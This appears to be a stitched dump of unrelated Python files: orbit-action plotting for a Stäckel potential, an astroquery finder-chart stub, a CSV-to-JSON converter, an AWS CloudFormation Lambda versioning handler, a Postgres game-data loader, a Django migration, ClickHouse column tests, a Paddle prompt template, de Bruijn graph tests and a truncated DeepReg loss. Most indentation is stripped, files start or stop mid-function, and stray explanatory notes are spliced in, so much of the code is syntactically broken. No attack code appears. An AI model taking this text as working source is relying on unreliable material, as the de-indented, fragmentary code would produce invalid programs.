act,ang,n_vec,toy_aa, pars = find_actions(results, timeseries,N_matrix=j,ifprint=False,use_box=True)
# Check all modes
checks,maxgap = ced(n_vec,ua(toy_aa.T[3:].T,np.ones(3)))
if len(maxgap)>0:
maxgap = np.max(maxgap)
else:
maxgap = 0
diffact[k] = act[:3]/TT.action(results[0])
            print(i, j, print_max_average(n_vec, toy_aa.T[3:].T, act[3:]),
                  str(ang[3:6] - TT.freq(results[0])).replace('[', '').replace(']', ''),
                  str(np.abs(act[:3] - TT.action(results[0]))).replace('[', '').replace(']', ''),
                  len(checks), maxgap)
MAXGAPS = np.append(MAXGAPS,maxgap)
difffreq[k] = ang[3:6]/TT.freq(results[0])
size = 15
if(P=='.'):
size = 30
        LW = np.array([0.5 + 0.5 * m for m in MAXGAPS])
a[0].scatter(Sr,np.log10(np.abs(diffact.T[2]-1)),marker=P,s=size, color=C,facecolors="none",lw=LW,label=r'$T =\,$'+str(i)+r'$\,T_F$')
a[1].scatter(Sr,np.log10(np.abs(difffreq.T[2]-1)),marker=P,s=size, color=C,facecolors="none", lw=LW)
a[1].get_yticklabels()[-1].set_visible(False)
a[0].set_xticklabels([])
a[0].set_xlim(1,13)
a[0].set_ylabel(r"$\log_{10}|J_3^\prime/J_{3, \rm true}-1|$")
leg = a[0].legend(loc='upper center',bbox_to_anchor=(0.5,1.4),ncol=2, scatterpoints = 1)
leg.draw_frame(False)
a[1].set_xlim(1,13)
a[1].set_xlabel(r'$N_{\rm max}$')
a[1].set_ylabel(r"$\log_{10}|\Omega_3^\prime/\Omega_{3,\rm true}-1|$")
plt.savefig('Sn_T_box.pdf',bbox_inches='tight')
def plot3D_stacktriax(initial,final_t,N_MAT,file_output):
""" For producing plots from paper """
# Setup Stackel potential
TT = pot.stackel_triax()
times = choose_NT(N_MAT)
timeseries=np.linspace(0.,final_t,times)
# Integrate orbit
results = odeint(pot.orbit_derivs2,initial,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
# Find actions, angles and frequencies
(act,ang,n_vec,toy_aa, pars),loop = find_actions(results, timeseries,N_matrix=N_MAT,ifloop=True)
toy_pot = 0
if(loop[2]>0.5 or loop[0]>0.5):
toy_pot = pot.isochrone(par=np.append(pars,0.))
else:
toy_pot = pot.harmonic_oscillator(omega=pars[:3])
# Integrate initial condition in toy potential
timeseries_2=np.linspace(0.,2.*final_t,3500)
results_toy = odeint(pot.orbit_derivs2,initial,timeseries_2,args=(toy_pot,))
    print("True actions: ", TT.action(results[0]))
    print("Found actions: ", act[:3])
    print("True frequencies: ", TT.freq(results[0]))
    print("Found frequencies: ", ang[3:6])
# and plot
f,a = plt.subplots(2,3,figsize=[3.32,5.5])
a[0,0] = plt.subplot2grid((3,2), (0, 0))
a[1,0] = plt.subplot2grid((3,2), (0, 1))
a[0,1] = plt.subplot2grid((3,2), (1, 0))
a[1,1] = plt.subplot2grid((3,2), (1, 1))
a[0,2] = plt.subplot2grid((3,2), (2, 0),colspan=2)
plt.subplots_adjust(wspace=0.5,hspace=0.45)
# xy orbit
a[0,0].plot(results.T[0],results.T[1],'k')
a[0,0].set_xlabel(r'$x/{\rm kpc}$')
a[0,0].set_ylabel(r'$y/{\rm kpc}$')
a[0,0].xaxis.set_major_locator(MaxNLocator(5))
# xz orbit
a[1,0].plot(results.T[0],results.T[2],'k')
a[1,0].set_xlabel(r'$x/{\rm kpc}$')
a[1,0].set_ylabel(r'$z/{\rm kpc}$')
a[1,0].xaxis.set_major_locator(MaxNLocator(5))
# toy orbits
a[0,0].plot(results_toy.T[0],results_toy.T[1],'r',alpha=0.2,linewidth=0.3)
a[1,0].plot(results_toy.T[0],results_toy.T[2],'r',alpha=0.2,linewidth=0.3)
# Toy actions
a[0,2].plot(Conv*timeseries,toy_aa.T[0],'k:',label='Toy action')
a[0,2].plot(Conv*timeseries,toy_aa.T[1],'r:')
a[0,2].plot(Conv*timeseries,toy_aa.T[2],'b:')
# Arrows to show approx. actions
arrow_end = a[0,2].get_xlim()[1]
arrowd = 0.08*(arrow_end-a[0,2].get_xlim()[0])
a[0,2].annotate('',(arrow_end+arrowd,act[0]),(arrow_end,act[0]),arrowprops=dict(arrowstyle='<-',color='k'),annotation_clip=False)
a[0,2].annotate('',(arrow_end+arrowd,act[1]),(arrow_end,act[1]),arrowprops=dict(arrowstyle='<-',color='r'),annotation_clip=False)
a[0,2].annotate('',(arrow_end+arrowd,act[2]),(arrow_end,act[2]),arrowprops=dict(arrowstyle='<-',color='b'),annotation_clip=False)
# True actions
a[0,2].plot(Conv*timeseries,TT.action(results[0])[0]*np.ones(len(timeseries)),'k',label='True action')
a[0,2].plot(Conv*timeseries,TT.action(results[0])[1]*np.ones(len(timeseries)),'k')
a[0,2].plot(Conv*timeseries,TT.action(results[0])[2]*np.ones(len(timeseries)),'k')
a[0,2].set_xlabel(r'$t/{\rm Gyr}$')
a[0,2].set_ylabel(r'$J/{\rm kpc\,km\,s}^{-1}$')
leg = a[0,2].legend(loc='upper center',bbox_to_anchor=(0.5,1.2),ncol=3, numpoints = 1)
leg.draw_frame(False)
# Toy angle coverage
a[0,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[4]/(np.pi),'k.',markersize=0.4)
a[0,1].set_xlabel(r'$\theta_1/\pi$')
a[0,1].set_ylabel(r'$\theta_2/\pi$')
a[1,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[5]/(np.pi),'k.',markersize=0.4)
a[1,1].set_xlabel(r'$\theta_1/\pi$')
a[1,1].set_ylabel(r'$\theta_3/\pi$')
plt.savefig(file_output,bbox_inches='tight')
return act
if __name__=="__main__":
BoxP = np.array([0.1,0.1,0.1,142.,140.,251.])
LoopP = np.array([10.,1.,8.,40.,152.,63.])
ResP = np.array([0.1,0.1,0.1,142.,150.,216.5])
LongP = np.array([-0.5,18.,0.5,25.,20.,-133.1])
# Short-axis Loop
LowestPeriodLoop = 2*np.pi/15.30362865
# Fig 1
loop = plot3D_stacktriax(LoopP,8*LowestPeriodLoop,6,'genfunc_3d_example_LT_Stack_Loop.pdf')
# Fig 3
vs.Sn_plots('GF.Sn_loop','loop',loop,1)
# Box
LowestPeriodBox = 2.*np.pi/38.86564386
# Fig 2
box = plot3D_stacktriax(BoxP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Box.pdf')
# Fig 4
vs.Sn_plots('GF.Sn_box','box',box,0)
# Res
LowestPeriodRes = 2.*np.pi/42.182
# Fig 5
res = plot3D_stacktriax(ResP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Res.pdf')
# vs.Sn_plots('GF.Sn_box','box',res,0)
# Long-axis loop
LowestPeriodLong = 2.*np.pi/12.3
'''
Panel object contains
up to one image in the background,
and any number of catalogs plotted.
'''
import astroquery.skyview
from astropy.wcs import WCS
class Panel:
'''
A single frame of a finder chart,
that has up to one image in the background,
and any number of catalogs plotted.
'''
def __init__(self, image, catalogs=None):
pass
#???
# define the images that accessible to skyview
twomass = ['2MASS-J', '2MASS-H', '2MASS-K']
ukidss = ['UKIDSS-Y', 'UKIDSS-J', 'UKIDSS-H', 'UKIDSS-K']
wise = ['WISE 3.4', 'WISE 4.6', 'WISE 12', 'WISE 22']
dss1 = ['DSS1 Blue', 'DSS1 Red']
dss2 = ['DSS2 Blue', 'DSS2 Red']
GALEX = ['GALEX Far UV', 'GALEX Near UV']
class Image:
'''
This represents images that lines up with a given patch of the sky.
'''
def __init__(self, hdu, name=None):
'''
Initialize an image.
Parameters
----------
hdu : a PrimaryHDU file
FITS file
'''
self.header = hdu.header
self.data = hdu.data
self.wcs = WCS(hdu.header)
self.name = name
import csv
import json
from collections import defaultdict
f = open('DOOSTROOM_new.csv', 'rU')
h = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
for line in f:
line_list = line.split(";")
h[line_list[7]]["oorsprong"][line_list[3]] += int(line_list[12])
h[line_list[7]]["profiel"][line_list[6]] += int(line_list[12])
# Parse the CSV into JSON
out = json.dumps(h)
print("JSON parsed!")
# Save the JSON
f = open('data2015.json', 'w')
f.write(out)
print("JSON saved!")
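The triple-nested `defaultdict` used above lets the script increment counters without creating any intermediate dicts first; a minimal sketch with made-up keys:

```python
import json
from collections import defaultdict

h = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
h['A']['oorsprong']['B'] += 2   # no KeyError: missing levels spring into being
h['A']['oorsprong']['B'] += 3
print(json.dumps(h))  # {"A": {"oorsprong": {"B": 5}}}
```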
import boto3
from botocore.vendored import requests
import json
from uuid import uuid4
def send(event, context, response_status, Reason=None, ResponseData=None, PhysicalResourceId=None):
response_url = event.get('ResponseURL', "")
json_body = json.dumps({
'Status' : response_status,
'Reason' : Reason or 'See the details in CloudWatch Log Stream: ' + context.log_stream_name,
'PhysicalResourceId' : PhysicalResourceId or context.log_stream_name,
'StackId' : event.get('StackId', ""),
'RequestId' : event.get('RequestId', ""),
'LogicalResourceId' : event.get('LogicalResourceId', ""),
'NoEcho' : True,
'Data' : ResponseData})
headers = {
'content-type' : '',
'content-length' : str(len(json_body))
}
try:
        print(json_body)
response = requests.put(response_url,data=json_body,headers=headers)
print("Status code: " + response.reason)
except Exception as e:
print("Failed to send response to CFN: error executing requests.put: " + str(e))
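For reference, the body that `send` PUTs to the pre-signed `ResponseURL` follows the CloudFormation custom-resource response contract (empty content type, explicit length). A sketch in which every identifier is a hypothetical placeholder:

```python
import json

# All values below are made-up placeholders, not real AWS identifiers
body = json.dumps({
    'Status': 'SUCCESS',
    'Reason': 'See the details in CloudWatch Log Stream: example-stream',
    'PhysicalResourceId': 'example-resource-id',
    'StackId': 'example-stack-id',
    'RequestId': 'example-request-id',
    'LogicalResourceId': 'LambdaVersion',
    'NoEcho': True,
    'Data': {'VersionArn': 'example-arn:3'},
})
# CloudFormation expects an empty content-type and an explicit length header
headers = {'content-type': '', 'content-length': str(len(body))}
print(headers['content-length'])
```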
def new_version(lambda_arn, text):
try:
client = boto3.client('lambda')
return (
True,
{ "VersionArn": "{}:{}".format(lambda_arn, client.publish_version(FunctionName=lambda_arn)["Version"]) },
"{} Successful".format(text)
)
except Exception as e:
        print(e)
return (False, "", "Error during {}: {}".format(text, e))
def lambda_handler(event, context):
    print(event)
properties = event.get('ResourceProperties', {})
arn = properties.get('LambdaFunctionArn', "")
physical_resource_id = str(uuid4())
data = {}
req_type = event.get('RequestType', "")
if req_type == 'Create':
res, data, reason = new_version(arn, "Create")
elif req_type == 'Update':
res, data, reason = new_version(arn, "Update")
elif req_type == 'Delete':
physical_resource_id = properties.get('PhysicalResourceId', '')
res = True
reason = "Delete Successful"
else:
res = False
reason = "Unknown operation: " + req_type
status = "FAILED"
if res:
status = "SUCCESS"
send(event, context, status, Reason=reason, ResponseData=data, PhysicalResourceId=physical_resource_id)
"""Main module."""
import os
import sys
import time
from datetime import datetime
import pandas as pd
import ipapi
import sqlalchemy as sqla
try:
DATA_DATE = os.environ['DATA_DATE']
print('Using data from {}'.format(DATA_DATE))
except:
print('Envvar DATA_DATE not set.')
sys.exit(1)
try:
POSTGRES_PASSWORD = os.environ['POSTGRES_PASSWORD']
print('Using password from POSTGRES_PASSWORD')
except:
print('Envvar POSTGRES_PASSWORD not set.')
sys.exit(1)
try:
POSTGRES_USER = os.environ['POSTGRES_USER']
print('Using password from POSTGRES_USER')
except:
print('Envvar POSTGRES_USER not set.')
sys.exit(1)
try:
POSTGRES_DB = os.environ['POSTGRES_DB']
print('Using password from POSTGRES_DB')
except:
print('Envvar POSTGRES_DB not set.')
sys.exit(1)
# define database connection
db_name = POSTGRES_DB
db_user = POSTGRES_USER
db_pass = POSTGRES_PASSWORD
db_host = 'database'
db_port = '5432'
DB_CONNECTION = 'postgresql://{}:{}@{}:{}/{}'.format(
db_user, db_pass, db_host, db_port, db_name
)
# define constants
DATA_PATH = './data'
DB_LAYER_0 = 'layer0'
DB_LAYER_1 = 'layer1'
RETRY_COUNT = 5
DELAY_TIME = 5
def import_hb(file_path):
# import csv file - hb
# import data to DataFrame
print('Reading hb data from {}'.format(file_path))
try:
data_hb2 = pd.read_csv(file_path)
return(data_hb2)
except:
print('hb data not accessible')
def import_wwc(file_path):
# import json file - wwc
# import data to DataFrame
print('Reading wwc data from {}'.format(file_path))
try:
data_wwc_i = pd.read_json(file_path, lines=True)
# split data into dataframe columns
dfs = []
for c in data_wwc_i:
tmp = pd.DataFrame(list(data_wwc_i[c]))
tmp.columns = [c + '_%s' % str(i+1) for i in range(tmp.shape[1])]
dfs.append(tmp)
data_wwc = pd.concat(dfs, 1)
return(data_wwc)
except:
print('wwc data not accessible')
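The column-splitting loop above expands list-valued cells into numbered columns (`col_1`, `col_2`, ...). A minimal sketch of the same operation on a made-up frame:

```python
import pandas as pd

# Each cell of the raw frame holds a list; expand it into numbered columns
raw = pd.DataFrame({'score': [[1, 2], [3, 4]]})
tmp = pd.DataFrame(list(raw['score']))
tmp.columns = ['score_%s' % str(i + 1) for i in range(tmp.shape[1])]
print(tmp.columns.tolist())  # ['score_1', 'score_2']
```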
def import_lov(file_path):
# import csv file - LOV
# import data to DataFrame
print('Reading LOV data from {}'.format(file_path))
try:
data = pd.read_csv(file_path)
return(data)
except:
print('data not accessible')
def ip_convert_country(
        ip_address_series,
        batch,
        sleep_time=60):
# get country code from IP address, ipapi limit - 1,000 requests daily , 45/minute
# using IP-API
# series to list
size_counter = 0
country_code = ''
ip_list = ip_address_series.to_list()
code_list = []
# for each element in list get IP
for address in ip_list:
# if we reached free limit of 45 items per minute, sleep
if size_counter >= batch:
size_counter = 0
#print('Sleeping')
time.sleep(sleep_time)
else:
pass
try:
country_code = ipapi.location(address, output='country_code')
except:
country_code = 'NaN'
code_list.append(country_code)
size_counter += 1
code_series = pd.Series(code_list)
return(code_series)
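The batch-and-sleep pattern above (pause after every `batch` lookups to stay under the free API quota) can be isolated from the network call. A sketch with a tiny sleep so it runs quickly; the sample IPs are made up and nothing is actually resolved:

```python
import time

def rate_limited(items, batch, sleep_time=0.01):
    # Yield items unchanged, pausing after every `batch` of them
    for n, item in enumerate(items, start=1):
        yield item
        if n % batch == 0:
            time.sleep(sleep_time)

codes = list(rate_limited(['1.1.1.1', '8.8.8.8', '9.9.9.9'], batch=2))
print(codes)  # ['1.1.1.1', '8.8.8.8', '9.9.9.9']
```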
def import_game(
        game_id,
        export_date,
        data_path):
try:
export_date_d=datetime.strptime(export_date,'%Y-%m-%d')
except:
print('DATA_DATE is not in the right format. Please set in format YYYY-MM-DD.')
sys.exit(1)
date_y = export_date_d.strftime("%Y")
date_m = export_date_d.strftime("%m")
date_d = export_date_d.strftime("%d")
#data_path = '/musicdwh/musicdwh/data/'
wwc_path = '/wwc/{}/{}/{}/wwc.json'.format(date_y, date_m, date_d)
hb_path = '/hb/{}/{}/{}/hb.csv'.format(date_y, date_m, date_d)
# expecting date in format 'YYYY-MM-DD'
if game_id == 'wwc':
imported_data = import_wwc(data_path + wwc_path)
print('import wwc from: ' + data_path + wwc_path)
elif game_id == 'hb':
imported_data = import_hb(data_path + hb_path)
print('import hb from: ' + data_path + hb_path)
    else:
        raise ValueError('Please choose a game to import: wwc / hb')
return(imported_data)
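`import_game` turns the `YYYY-MM-DD` export date into a year/month/day partition directory. A small sketch of that path construction (the date is arbitrary):

```python
from datetime import datetime

# DATA_DATE is expected as YYYY-MM-DD; it selects the partition directory
d = datetime.strptime('2020-01-05', '%Y-%m-%d')
wwc_path = '/wwc/{}/{}/{}/wwc.json'.format(
    d.strftime('%Y'), d.strftime('%m'), d.strftime('%d'))
print(wwc_path)  # /wwc/2020/01/05/wwc.json
```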
def connect_to_db(db_con, retry_count, delay):
    # NOTE: retry_count and delay are accepted but currently unused;
    # the connection is attempted once without retries.
    print('Connecting to {}'.format(db_con))
    engine = sqla.create_engine(db_con, isolation_level="AUTOCOMMIT")
    return engine
def upload_to_db(
        df,
        db_table,
        engine,
        db_schema):
sql = sqla.text("TRUNCATE TABLE {}.{}".format(db_schema, db_table))
try:
engine.execute(sql)
except:
print("{}.{} - Table does not exist.".format(db_schema, db_table))
df.to_sql(db_table, engine, schema=db_schema, if_exists='append')
# main script
if __name__ == '__main__':
print("================================= starting load =================================")
# create database connection
engine = connect_to_db(DB_CONNECTION, RETRY_COUNT, DELAY_TIME)
# populate LOVs
LOV_PATH = '{}/LOVs'.format(DATA_PATH)
#LOV_gender
gender_df = import_lov('{}/LOV_gender.csv'.format(LOV_PATH))
upload_to_db (gender_df, 'lov_gender', engine, DB_LAYER_0)
#LOV_title
title_df = import_lov('{}/LOV_title.csv'.format(LOV_PATH))
upload_to_db (title_df, 'lov_title', engine, DB_LAYER_0)
# load wwc data
data_wwc = import_game ('wwc', DATA_DATE, DATA_PATH)
# load hb data
data_hb = import_game ('hb', DATA_DATE, DATA_PATH)
# get country codes from IP address
ip_code_series = ip_convert_country(data_hb['ip_address'], 30, 100)
# append country code to hb dataframe
data_hb['country_code']=ip_code_series
# upload daily data to database, schema L0
upload_to_db (data_hb, 'import_data_hb', engine, DB_LAYER_0)
upload_to_db (data_wwc, 'import_data_wwc', engine, DB_LAYER_0)
# run load to Layer1
with open('./sql_scripts/04_L0_L1_load.sql', 'r') as sql_file:
script_string = sql_file.read()
print('Running insert script L0_L1_load')
db_script = engine.execute(script_string)
# run updates on existing records
with open('./sql_scripts/05_L0_L1_update.sql', 'r') as sql_file:
script_string = sql_file.read()
print('Running update script L0_L1_update')
db_script = engine.execute(script_string)
# Generated by Django 3.1.13 on 2021-08-03 13:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('biserici', '0032_auto_20210803_1622'),
]
operations = [
migrations.AddField(
model_name='descriere',
name='solee_detalii',
field=models.TextField(blank=True, null=True, verbose_name='Solee (observații)'),
),
migrations.AddField(
model_name='historicaldescriere',
name='solee_detalii',
field=models.TextField(blank=True, null=True, verbose_name='Solee (observații)'),
),
]
from copy import deepcopy
import pytest
from snuba.clickhouse.columns import (
UUID,
AggregateFunction,
Array,
ColumnType,
Date,
DateTime,
Enum,
FixedString,
Float,
IPv4,
IPv6,
Nested,
ReadOnly,
)
from snuba.clickhouse.columns import SchemaModifiers as Modifier
from snuba.clickhouse.columns import String, UInt
TEST_CASES = [
pytest.param(
String(Modifier(nullable=True)),
String(),
String(),
"Nullable(String)",
id="strings",
),
pytest.param(
UUID(Modifier(readonly=True)),
UUID(),
UUID(Modifier(nullable=True)),
"UUID",
id="UUIDs",
),
pytest.param(IPv4(None), IPv4(), IPv4(Modifier(nullable=True)), "IPv4", id="IPs",),
pytest.param(IPv6(None), IPv6(), IPv6(Modifier(nullable=True)), "IPv6", id="IPs",),
pytest.param(
FixedString(32, Modifier(nullable=True)),
FixedString(32),
FixedString(64, Modifier(nullable=True)),
"Nullable(FixedString(32))",
id="fixed strings",
),
pytest.param(
UInt(8, Modifier(nullable=True)),
UInt(8),
UInt(16, Modifier(nullable=True)),
"Nullable(UInt8)",
id="integers",
),
pytest.param(
Float(64, Modifier(nullable=True)),
Float(64),
Float(32, Modifier(nullable=True)),
"Nullable(Float64)",
id="floats",
),
pytest.param(Date(), Date(), Date(Modifier(nullable=True)), "Date", id="dates",),
pytest.param(
DateTime(),
DateTime(),
DateTime(Modifier(nullable=True)),
"DateTime",
id="datetimes",
),
pytest.param(
Array(String(Modifier(nullable=True))),
Array(String()),
Array(String()),
"Array(Nullable(String))",
id="arrays",
),
pytest.param(
Nested(
[("key", String()), ("val", String(Modifier(nullable=True)))],
Modifier(nullable=True),
),
Nested([("key", String()), ("val", String())]),
Nested([("key", String()), ("val", String())], Modifier(nullable=True)),
"Nullable(Nested(key String, val Nullable(String)))",
id="nested",
),
pytest.param(
AggregateFunction("uniqIf", [UInt(8), UInt(32)], Modifier(nullable=True)),
AggregateFunction("uniqIf", [UInt(8), UInt(32)]),
AggregateFunction("uniqIf", [UInt(8)], Modifier(nullable=True)),
"Nullable(AggregateFunction(uniqIf, UInt8, UInt32))",
id="aggregated",
),
pytest.param(
Enum([("a", 1), ("b", 2)], Modifier(nullable=True)),
Enum([("a", 1), ("b", 2)]),
Enum([("a", 1), ("b", 2)]),
"Nullable(Enum('a' = 1, 'b' = 2))",
id="enums",
),
]
@pytest.mark.parametrize("col_type, raw_type, different_type, for_schema", TEST_CASES)
def test_methods(
col_type: ColumnType,
raw_type: ColumnType,
different_type: ColumnType,
for_schema: str,
) -> None:
assert col_type == deepcopy(col_type)
assert col_type != different_type
# Test it is not equal to a type of different class.
assert col_type != ColumnType(Modifier(readonly=True))
assert col_type.for_schema() == for_schema
assert col_type.get_raw() == raw_type
modified = col_type.set_modifiers(col_type.get_modifiers())
assert modified is not col_type
assert modified == col_type
assert col_type.set_modifiers(Modifier(readonly=True)).has_modifier(ReadOnly)
"""Base Abstract Template class"""
from __future__ import annotations
import json
from abc import ABC
from collections import OrderedDict
from typing import Any, Dict, List
import numpy as np
import paddle
from paddle import nn
from paddlenlp.transformers.tokenizer_utils import PretrainedTokenizer
from paddle_prompt.config import Config
from paddle_prompt.schema import InputExample, InputFeature
from paddle_prompt.templates.engine import JinjaEngine
from paddle_prompt.utils import extract_and_stack_by_fields, lists_to_tensors
def _resize_prediction_mask(text: str, label_size: int) -> str:
mask_str = '[MASK]'
return text.replace(mask_str, ''.join([mask_str] * label_size))
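The widening performed by `_resize_prediction_mask` is easy to see on a one-line example; this sketch re-implements the same single-`replace` logic standalone:

```python
def resize_prediction_mask(text, label_size):
    # Same logic as above: widen the single '[MASK]' slot to label_size tokens
    return text.replace('[MASK]', '[MASK]' * label_size)

print(resize_prediction_mask('It was [MASK].', 3))  # It was [MASK][MASK][MASK].
```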
def _load_label2words(file: str) -> Dict[str, List[str]]:
label2words = OrderedDict()
with open(file, 'r', encoding='utf-8') as f:
data = json.load(f)
for label, label_obj in data.items():
label2words[label] = label_obj['labels']
return label2words
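`_load_label2words` expects a JSON file mapping each label to an object with a `labels` list. A sketch of that format and of the extraction it performs, using a made-up two-label verbalizer:

```python
import json
from collections import OrderedDict

# Hypothetical verbalizer file content: one entry per label, each carrying
# its candidate label words under the 'labels' key
raw = '{"positive": {"labels": ["good"]}, "negative": {"labels": ["bad"]}}'
label2words = OrderedDict(
    (label, obj['labels']) for label, obj in json.loads(raw).items()
)
print(label2words['positive'])  # ['good']
```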
class SoftMixin:
"""Soft Template Mixin object which can handle the soft token"""
def soft_token_ids(self) -> List[int]:
"""
This function identifies which tokens are soft tokens.
Sometimes tokens in the template are not from the vocabulary,
but a sequence of soft tokens.
In this case, you need to implement this function
"""
raise NotImplementedError
class Template(nn.Layer):
"""
abstract class for templates in prompt
TODO: how to handle -> fill the target label in the mask place
"""
def __init__(
self,
tokenizer: PretrainedTokenizer,
config: Config,
**kwargs
):
super().__init__(**kwargs)
self.render_engine = JinjaEngine.from_file(config.template_file)
self.tokenizer: PretrainedTokenizer = tokenizer
self.config: Config = config
self.label2words: Dict[str, List[str]] = _load_label2words(
config.template_file
)
self._init_max_token_num()
def _init_max_token_num(self):
max_token_num = 0
for words in self.label2words.values():
for word in words:
max_token_num = max(max_token_num, len(word))
self.config.max_token_num = max_token_num
def _get_mask_id(self) -> int:
# TODO: to be removed, this code is to fix the issue of paddlenlp
special_tokens = [token for token in self.tokenizer.all_special_tokens if token != self.config.mask_token]
special_ids: List[int] = self.tokenizer.convert_tokens_to_ids(special_tokens)
ids = self.tokenizer.convert_tokens_to_ids([self.config.mask_token])
        ids = [token_id for token_id in ids if token_id not in special_ids]
assert len(ids) == 1, 'can"t get [MASK] id from tokenizer'
return ids[0]
def wrap_examples(
self,
examples: List[InputExample],
label2idx: Dict[str, int] = None
):
"""wrap examples with template and convert them to features
which can be feed into MLM
Args:
examples (List[InputExample]): the examples object
label2idx (Dict[str, int], optional): label to index mapper.
Defaults to None.
Returns:
List[Tensor]: the features which will be feed into MLM
"""
if not label2idx:
label2idx = self.config.label2idx
# 1. construct text or text pair dataset
texts = [self.render_engine.render(example) for example in examples]
texts = [_resize_prediction_mask(
text, self.config.max_token_num) for text in texts]
encoded_features = self.tokenizer.batch_encode(
texts,
max_seq_len=self.config.max_seq_length,
pad_to_max_seq_len=True,
return_token_type_ids=True,
)
fields = ['input_ids', 'token_type_ids']
# 2. return different data based on label
has_label = examples[0].label is not None
if not has_label:
return extract_and_stack_by_fields(encoded_features, fields)
label_ids = []
is_multi_class = isinstance(examples[0].label, list)
if not is_multi_class:
label_ids = [label2idx[example.label] for example in examples]
else:
for example in examples:
example_label_ids = [label2idx[label]
for label in example.label]
label_ids.append(example_label_ids)
features = extract_and_stack_by_fields(encoded_features, fields)
# 3. construct prediction mask
mask_token_id = self._get_mask_id()
mask_label_mask = np.array(features[0]) == mask_token_id
np_prediction_mask = np.argwhere(mask_label_mask)
prediction_mask = []
for pre_mask in np_prediction_mask:
prediction_mask.append(
pre_mask[0] * self.config.max_seq_length + pre_mask[1])
features.append(np.array(prediction_mask))
# 4. construct mask_label_ids
mask_label_ids = []
for example in examples:
mask_label_ids.extend(
self.tokenizer.convert_tokens_to_ids(
# TODO: to handle the multiple words?
list(self.label2words[example.label][0])
)
)
features.append(np.array(mask_label_ids))
# 5. add label ids data
features.append(
np.array(label_ids)
)
features = lists_to_tensors(features, self.config.place())
return features
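Step 3 above turns the 2-D (row, column) positions returned by `np.argwhere` into indices over the flattened batch via `row * max_seq_length + col`. A dependency-free sketch of that computation (the mask token id 103 is an assumption for illustration):

```python
max_seq_length = 4
mask_token_id = 103  # assumed [MASK] id, for illustration only
input_ids = [[101, 7, 103, 102],
             [101, 103, 8, 102]]

# mirrors step 3 above: np.argwhere yields (row, col) pairs, which are
# flattened as row * max_seq_length + col
prediction_mask = [r * max_seq_length + c
                   for r, row in enumerate(input_ids)
                   for c, tok in enumerate(row)
                   if tok == mask_token_id]
print(prediction_mask)  # [2, 5]
```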
def forward(self, *args, **kwargs) -> Any:
"""Should handle the template's main forward logic.
Returns:
Any: any result. TODO: define the forward result data structure.
"""
# --- tests/test_eulerian.py (repo: guojingyu/DeNovoAssembly, license: MIT) ---
#!/usr/bin/env python
"""
Test eulerian functions including the random walk
Author : Jingyu Guo
"""
import unittest
from de_novo_assembly.de_bruijn_graph import DeBruijnGraph
from Bio.SeqRecord import SeqRecord
from de_novo_assembly.eulerian import has_euler_path, has_euler_circuit, \
make_contig_from_path, eulerian_random_walk
class EulerianTests(unittest.TestCase):
def setUp(self):
self.sequence_1 = "ATTAGACCTG"
self.sequence_2 = "ATTTAGACCCTG"
self.sequence_3 = "AGACCCTGAGTCG"
self.test_seq_1 = {'seq_1': SeqRecord(self.sequence_1)}
self.test_seq_2 = {'seq_2': SeqRecord(self.sequence_2),
'seq_3': SeqRecord(self.sequence_3)}
self.dbg_1 = DeBruijnGraph(self.test_seq_1,k=4)
# now link the dbg_1 to make a Eulerian circle
self.dbg_1.G.add_edge("CTG", "ATT")
self.dbg_2 = DeBruijnGraph(self.test_seq_2,k=6)
self.reference_eulerian_path_2 = [('ATTT', 'TTTA'), ('TTTA', 'TTAG'),
('TTAG', 'TAGA'), ('TAGA', 'AGAC'),
('AGAC', 'GACC'), ('GACC', 'ACCC'),
('ACCC', 'CCCT'), ('CCCT', 'CCTG'),
('CCTG', 'CTGA'), ('CTGA', 'TGAG'),
('TGAG', 'GAGT'), ('GAGT', 'AGTC'),
('AGTC', 'GTCG')]
def test_has_euler_path_function(self):
assert has_euler_circuit(self.dbg_1.G)
flag, _, _ = has_euler_path(self.dbg_1.G)
assert not flag
def test_has_euler_circuit_function(self):
assert not has_euler_circuit(self.dbg_2.G)
flag, _, _ = has_euler_path(self.dbg_2.G)
assert flag
def test_eulerian_random_walk(self):
print(eulerian_random_walk(self.dbg_2))
class PathToSequenceTests(unittest.TestCase):
def setUp(self):
self.path_1 = [('1','2'),('2','3'),('3','4')]
self.seq_1 = '1234'
self.path_2 = [('1','2'),('2','3'),('3','4'),('4','1')]
self.seq_2 = '12341'
self.path_3 = [('1', '2'), ('2', '1')]
self.seq_3 = '121'
self.path_4 = [('1','2'),('2','3'),('3','1')]
self.seq_4 = '1231'
def test_path_to_sequence(self):
assert self.seq_1 == make_contig_from_path(self.path_1)
assert self.seq_2 == make_contig_from_path(self.path_2)
assert self.seq_3 == make_contig_from_path(self.path_3)
assert self.seq_4 == make_contig_from_path(self.path_4)
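The fixtures in `PathToSequenceTests` imply that `make_contig_from_path` concatenates the head node of every edge and then appends the tail of the last edge. A hedged stand-in consistent with those fixtures (the real implementation lives in `de_novo_assembly.eulerian` and may differ for k-mer nodes):

```python
def make_contig_from_path_sketch(path):
    # join the head of every edge, then append the tail of the final edge
    return ''.join(edge[0] for edge in path) + path[-1][1]

print(make_contig_from_path_sketch([('1', '2'), ('2', '3'), ('3', '4')]))  # 1234
```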
# --- deepreg/model/loss/deform.py (repo: agrimwood/DeepRegFromMain20200714, license: Apache-2.0) ---
import tensorflow as tf
def local_displacement_energy(ddf, energy_type, **kwargs):
"""Computes a smoothness regularizer (bending energy or an L1/L2 gradient norm) over a dense displacement field."""
def gradient_dx(fv):
return (fv[:, 2:, 1:-1, 1:-1] - fv[:, :-2, 1:-1, 1:-1]) / 2
def gradient_dy(fv):
return (fv[:, 1:-1, 2:, 1:-1] - fv[:, 1:-1, :-2, 1:-1]) / 2
def gradient_dz(fv):
return (fv[:, 1:-1, 1:-1, 2:] - fv[:, 1:-1, 1:-1, :-2]) / 2
def gradient_txyz(Txyz, fn):
return tf.stack([fn(Txyz[..., i]) for i in [0, 1, 2]], axis=4)
def compute_gradient_norm(displacement, l1=False):
dTdx = gradient_txyz(displacement, gradient_dx)
dTdy = gradient_txyz(displacement, gradient_dy)
dTdz = gradient_txyz(displacement, gradient_dz)
if l1:
norms = tf.abs(dTdx) + tf.abs(dTdy) + tf.abs(dTdz)
else:
